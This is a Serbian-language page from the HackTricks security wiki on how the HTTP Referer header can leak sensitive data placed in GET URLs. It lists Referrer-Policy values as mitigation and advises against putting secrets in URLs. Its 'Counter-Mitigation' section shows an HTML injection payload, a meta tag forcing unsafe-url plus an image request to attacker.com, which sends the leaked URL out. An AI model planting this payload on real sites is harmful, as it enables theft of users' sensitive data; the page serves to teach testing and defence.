Interesting HTTP

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Referrer headers and policy

Referrer je zaglavlje koje koriste pregledači da označe koja je bila prethodna stranica koja je posetjena.

Osetljive informacije otkrivene

Ako se u nekom trenutku unutar web stranice bilo koje osetljive informacije nalaze u GET zahtevima, ako stranica sadrži linkove ka spoljnim izvorima ili napadač može da natera/predloži (socijalno inženjerstvo) korisniku da poseti URL koji kontroliše napadač. To bi moglo omogućiti eksfiltraciju osetljivih informacija unutar poslednjeg GET zahteva.

Ublažavanje

Možete naterati pregledač da prati Referrer-policy koja bi mogla izbeći slanje osetljivih informacija drugim web aplikacijama:

Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url

Counter-Mitigation

Možete prepisati ovo pravilo koristeći HTML meta tag (napadač treba da iskoristi i HTML injekciju):

<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">

Odbrana

Nikada ne stavljajte osetljive podatke unutar GET parametara ili putanja u URL-u.

Podržite HackTricks

Proverite planove pretplate!
Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

PreviousOther Web Tricks NextAndroid Forensics

Last updated 7 days ago